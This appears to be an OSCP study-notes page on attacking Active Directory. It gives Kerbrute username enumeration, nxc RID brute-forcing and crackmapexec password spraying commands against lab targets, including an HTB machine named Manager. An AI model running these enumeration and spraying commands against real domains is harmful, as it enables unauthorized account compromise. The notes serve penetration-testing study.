// notes/ Active Directory
🏛️
Initial Attack Strategy Kerbrute
Bruteforcing domain usernames is possible with Kerbrute. This is valuable from an information gathering perspective and can lead to some quick wins.
#active directory#adot8
source · oscp.adot8.com · active-directory/initial-attack-strategy_kerbrute ↗Kerbrute
Overview
Bruteforcing domain usernames is possible with Kerbrute. This is valuable from an information gathering perspective and can lead to some quick wins.
After finding some usernames you can password spray those accounts using their usernames as passwords. This is very common in the real world.
{% embed url="https://github.com/ropnop/kerbrute" %}
Kerbrute Attack
CAN ALSO BE DONE BRUTEFORCING RID's USING NXC
code
01nxc smb 10.10.11.236 -u anonymous -p "" --rid-brute 10000Enumerate for users
bash
$kerbrute userenum -d PNPT.LOCAL users.txt --dc DC.PNPT.LOCAL{% hint style="info" %} /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt {% endhint %}
<figure><img src="/files/xZLjWppNB8nrL0tmA05c" alt=""><figcaption><p>HTB machine Manager</p></figcaption></figure>Password spray using --no-brute to avoid account lockout
bash
$crackmapexec smb 192.168.1.129 -u users.txt -p users.txt --no-brute -d manager.htb